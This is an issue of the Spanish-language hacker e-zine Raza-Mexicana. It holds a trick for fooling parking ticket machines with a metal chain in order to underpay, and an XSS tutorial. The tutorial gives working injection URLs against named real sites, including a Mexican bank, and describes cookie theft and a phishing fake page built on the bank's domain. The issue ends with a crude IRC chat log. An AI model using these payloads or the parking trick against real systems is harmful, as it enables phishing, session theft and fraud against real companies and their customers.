(Tesis)

<< Regresar al ndice

Por: beavis (beavis@underground.org.mx)

Muchos de nosotros hemos utilizado el acceso a los estacionamientos de plazas o centros comerciales, los cuales muchas veces al estar el vehculo frente a la boletera nos da automticamente el boleto o tenemos que apretar el botn y tomarlo. Bueno, ahora veremos la forma sencilla de sacar los boletos sin utilizar un auto evitando as el anti-passback, con esto podemos por ejemplo sacar otro boleto y pagar menos de el tiempo que estuvimos realmente dentro del estacionamiento, por si extraviamos el boleto, etc..(Espero que no se preste para robo de autos). Tan solo necesitamos un metal de al menos un metro de largo, como pudiera ser una cadena, la cual es fcil de transportar en nuestro auto :P, casi enfrente de la boletera veremos un rectngulo en el piso en el cual hay un lazo inductivo que est conectado a un detector de masa metlica y este sirve para registrar la presencia de los autos. Cuando un auto se posa sobre ella se produce una variacin en el valor de su inductancia lo cual es interpretado por el detector de masa metlica produciendo el accionamiento de una de sus salidas, en este caso para imprimir y expedir nuestro boleto. :D Es la funcin que har nuestra cadena en este caso al arrastrarla a lo ancho del rectngulo y as hacernos de nuestro boleto.

Raza-Mexicana #21

Anti-passback: algunos lugares tienen cmaras que toman la placa del auto y si solo tomas el boleto y retrocedes, automticamente invalida el boleto haciendo este intil a la hora de querer pagar.

Este sistema lo utilizan mucho en los semforos para darle prioridad al sentido que tiene ms vehculos.

Esto lo he comprobado en un centro comercial del norte de la Cd. De Mex. Entre Marina Nacional y Circuito Interior, uno de Av. Cuauhtmoc y Circuito Interior jejeje.

Gr33ts: el5patas, Nitr0us, hkm, Napa, Psymera, Arphanet, Rey Brujo, DeadSector, Kania, Darko, Alt3kx, PonchoWare, Crac, C31|4, Yas, la tamalera de la esquina, bla bla bla.

<< Regresar al ndice

Raza-Mexicana #21

Por: Netxing (netxing@raza-mexicana.org) Bien lo dijo Marc Slemk: This issue isn't just about scripting, and there isn't necessarily anything cross-site about it. So why the name? It was coined earlier on when the problem was less understood, and it stuck. Believe me, we have had more important things to do than think of a better name. Todos los ejemplos descritos en este artculo fueron probados en Mozilla Firefox 3.6.3. Cross Site Scripting es un falla de seguridad generalmente encontrada en aplicaciones web, histricamente un ataque XSS se conoca como aquel ataque donde se poda inyectar cdigo script dentro de un sitio web, ahora las cosas han cambiado un XSS puede ser utilizado en los mismos navegadores o en un nivel de aplicacin local. El principal problema con este tipo de ataque se encuentra en la mala validacin de datos que pueden ser ingresados por el usuario de una manera completa o lgicamente insegura. Esto permite realizar ataques desde spoofing, XSRF, phishing hasta exploits e incluso es muy factible hacer XSS a los navegadores . Pero para cuando un sitio web se considera vulnerable a un ataque XSS puede conllevar a otro tipo de ataques, como SQL Injection. Los tipos de ataques XSS como dice el manual de Wikipedia se clasifican casi siempre de dos maneras: directa e indirectamente. Un ataque indirecto se puede realizar cuando los datos de una pgina inicio son enviados a una pgina receptora para ser procesados y en lo cual los valores de las variables pueden ser alterados, esto generalmente se lleva por medio de URL, cookies y hasta objetos DOM del navegador. Hay cdigos que grandes empresas utilizan para crear sus sitios webs completamente frameados lo cual significa un riesgo considerable al momento de un ataque XSS. Un ataque directo est clasificado segn el manual cuando se puede modificar el contenido HTML dentro de un sitio web, utilizando las etiquetas <script> o <iframe>. La parte tcnica de ataques XSS Raza-Mexicana #21 Ataque combinado. Comencemos con el proceso ms simple y muy usado en la red. Atacando lo sitios creados con frames/iframes, generalmente esto se hace pasando parmetros en la URL, ejemplo: http://www.ejemplo.com/make.asp?frame1=menu.html&frame2=arriba_frame.html

En este ejemplo tenemos un par de pginas, las cuales se pasan como parmetros para generar el sitio, si observamos y revisamos el cdigo HTML del iframe o del frame, sabremos que el cdigo invocador trabaja de esta manera: ... <iframe src="make.asp?frame1=menu.html&frame2=arriba_frame.html " frameborder="0" scrolling="auto"...> ... Ahora, qu pasa si modificamos la URL quedando de esta manera: http://www.ejemplo.com/make.asp?frame1= onload="alert('XSS')

El cdigo inyectado al final quedara: ... <iframe src=" onload="alert('XSS')" frameborder="0" scrolling="auto"...> ... Lo cual nos arrojara un alerta al cargar la pagina:

Con esto obtenemos una inyeccin satisfactoria, lo cual podemos usar como inicio para poder inyectar cdigo script. Otras pginas fcilmente de explotar son las que utilizan sistemas de bsqueda dentro del mismo sitio, pongamos de ejemplo la compaa BBB, la cual acredita a otras grandes compaas como xoom.com la cual permite enviar dinero electrnicamente a gran parte del mundo. Esta compaa BBB, tiene un sistema de bsqueda con una falla XSS fcil de explotar: http://www.bbb.org/us/WWWRoot/Search.aspx?site=&s=%22%3E%3Cscript%3Ealert%28%27XSS %27%29%3C%2fscript%3E Raza-Mexicana #21 Otra falla grave para la explotacin de XSS es el uso de un sistema de bsqueda el cual se puede conseguir por un proveedor alterno, ya sea comprado o gratuito, en este caso hablemos de las compaas Tvazteca o Televisa, que tienen el mismo sistema de bsqueda y por lo consiguiente la misma vulnerabilidad. http://www.tvazteca.com/search/index/index?q=%3Cscript%3Ealert%28%27XSS%27%29%3C/scri pt%3E

http://www.televisa.com/search/index.php?keyword=%3Cscript%3Ealert%28%27XSS%27%29%3C /script%3E

Ataques Directos Comiendo cookies Una de las cosas ms importantes cuando se usa un ataque XSS es poder obtener sesiones de un usuario validado dentro de algn sitio web, ya sea desde pginas sociales hasta sesiones bancarias. Como se explota esta vulnerabilidad? En mi sentido de investigacin he llegado a la conclusin que se necesitaran dos cosas para que este ataque pueda llegar a tener xito: 1.- Una sesin abierta. 2.- Una pgina bien establecida para el uso de alguna librera como cURL para guardar/enviar la informacin en cache. Otro tipo de ataques se realizan en el sistema de consultas de los sitios, ejemplo: http://badoo.com/signup/?%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E

XSS en navegadores Si te preguntas que tipo de tcnica es esta, pues no es nueva y desde el inicio del uso de los navegadores esta es la forma que se ha utilizado el manejo de datos. Entindase hasta este punto que como en toda la rama de la seguridad informtica, que no hay un navegador 100% seguro, no importando los filtros de proteccin XSS que se tenga, ni actualizaciones, marcas, modelos, estilos etc El porqu de esto es simple, para que un navegador fuera 100% seguro se ocupara que este no recibiera datos y aun as lo seguira dudando Este tipo de tcnica no funciona de igual manera en todos los navegadores, pero la base es la misma, vayamos a los detalles. Revisemos rpidamente el esquema de cmo maneja la informacin un navegador usando el protocolo de datos. Raza-Mexicana #21 Sintaxis: data:[<tipo>][;codificacin],<datos a ejecutar>

Ejemplo: data:text/html;charset=utf-8,%3Cscript%3Ealert%28%22razamexicana%22%29%3B%3C%2fscript%3E

Si copiamos y pegamos este ejemplo en la barra de direccin de nuestro navegador veremos que tambin funciona, entonces tal vez podamos usarlo en cdigo ms complejo y se dice que es posible usarlo para ejecutar o pasar parmetros a otro tipo de programas desde el mismo navegador. XSS en el sitio de Bancomer Adelante As comenz la historia Dia 1, me retiraba a dormir con mi ultimo danonino en la mano, cuando una pequea vibra sacudi mi curiosidad, ya que al revisar la pagina principal de Bancomer estaba completamente frameada dividida en 5 secciones, top, left, right, main y bottom... usando como referencia gobierno.asp como motor de creacin de la pgina completa, me dije, un bug enorme, as que decid pasarle unos parmetros para ver que hacia... http://www.bancomer.com/gobierno/gobierno.asp?mainf=http://www.razamexicana.org&rightf=http://foros.razamexicana.org&leftf=http://www.google.com&topf=http://milw0rm.com/

En este momento me di cuenta que mi danonino se acababa entonces, me decid a hacerle un XSS simple, as que modifique los parmetros y quedaron as: http://www.bancomer.com/gobierno/gobierno.asp?mainf=http://www.razamexicana.org&topf=%22%20onload=%22alert%28%27XSS%27%29%22

Finalmente termine concluyendo factible a phishing: http://www.bancomer.com/persona/persona.asp?mainf=perso_creco.html&rightf=http://beta.ra za-mexicana.org/bancomer/perso_acceso_subhome.html Termin de chingarme mi danonino y a dormir... Se agrega el archivo Advisory_bancomer.txt con todas las fallas encontradas. Se agrega el archivo tp.html el cual llego a usarse como validacin para un gran nmero de formas y para creador de paginas htmls... validar tarjetas desde prepagadas hasta sams, honda, vida Bancomer, suburbia.... Un saludo a los lectores y en especial a maxpower por su ayuda en la creacin de la pagina fake para el phishing.

Raza-Mexicana #21

<< Regresar al ndice

Por: STAFF (staff@raza-mexicana.org)

Siguiendo la tradicin de mis antepasados editores, continuamos con una pequea muestra de la maravillosa idiosincracia que prevalece en el canal #razamex. Logs cortesa de zhooter. ********** <Yield> pues yo crei que wireless iba a hechar luz en la obscuridad de mi ignorancia pero termine viendo una manifestacin hd changes topic to 'http://lopez-obrador.info/ : Con Lpez Obrador todos los virus seran para Mac.' <Yield> ay brujo, eres barrio, emprendedor y curandero, por que no te conoci antes <Yield> voy a cometer fraudes electronicos nomas para desahogarme <Argelia> Con Lpez Obrador el himno nacional tendra ritmo de pasito duranguense.

<Neuro> o sea que te haga la tarea, webon como le preguntas eso a un psicologo <papas> Los psicologos deben tener cultura general

<Argelia> <Yield> mi gato acaba de atrapar un raton y se lo esta tragando enfrente de mi <--Pendejo, si ves que estan matando a tu familia, levanta las chingadas nalgas y has algo al respecto.

<Yield> pero lo que mas rula es estar cagando agua amarilla con olor a ceftazidima <Yield> y el pantalon que trae ahorita mi vecina, uyyy mi vecina Raza-Mexicana #21 <a_d_mIRC> tomale fotos <a_d_mIRC> a tu vecina puerco

<hd> Que puto buen humor. Vengan cabrones hoy hasta siento que los quiero.

<a_d_mIRC> Yieldo <a_d_mIRC> que opinas que el auto increible sea ahora un shelby mustang??? <Argelia> Pinche a_d_mIRC, con tantos pedos mundiales, economia, altercados en paises africanos, seguridad, narcotrafico... y sales con esas colosales mamadas.

<Cy> yo quisiera tener fashion el trasero <Argelia> Eres un hombre nuevo? Ya te metees estrogenos para que te salgan las lagrimas cuando ves las novelas del 2 abrazado con tu vieja?

<Darksource> tapulandia ya tiene un heroe!!!!! <Darksource> poioman poioman <Darksource> el poio justiciero!

rey_brujo (rey_brujo@420E77DF.8B3285A6.3F8A1FC8.IP) Quit ([irc.raza-mexicana.org] Local kill by DeadSector (saquese a la chingada por joto))

<a_d_mIRC> lastima que en mi tiempo de estudiante, no existia wikipedia <zhooter> ya existia internet?

<Yield> yo opino que papas debe ser el proximo director tecnico de la seleccion mexicana <Yield> fuck manpower, got raza-mexicana <Yield> haz soado que te coges a una pareja de enanos homosexuales? <hd> Inventar un dispositivo USB que apuale a quien usa IE.

Raza-Mexicana #21

<zhooter> hd cuando reviviste? <hd> Ayer, queran revivir a Michael Jackson pero se les pas de 1337ness la receta y sal yo

<Darksource> XDD ... me acaban de decir que pasaron o estuvieron los championes infectados aqui en mi cuidad

<Darksource> lo dudo... <hd> Chapiones? <Yield> infected mushroom we <hd> XD

<a_d_mIRC> donde esta argelia??? quiero contarle mi teoria <Yield> mi teoria es que eres un gordo bien puto y por eso no entras a lineage <Darksource> XDD <a_d_mIRC> eso es una teora

<hd> papas, patas, ratas, dnde qued la imaginacin aqu? Que sigue? El pasas? El tazas? <Argelia> <Yield> diablo 2 es para maricas <--- Neuro podria ir a tu casa a reventarte a sartenazos y a estrangularte con su mandil por ese comentario. ACOSADOR was kicked by papas (Indignante....)

<rey_brujo> Quien de aqu usa cubrebocas? <Wireless> papas * papas (1010010101@89ECE982.724C8C2C.E5532258.IP) Quit ([irc.raza-mexicana.org] Local kill by rey_brujo (tome por marica.))

<< Regresar al ndice

EOZ Raza-Mexicana #21

Vous aimerez peut-être aussi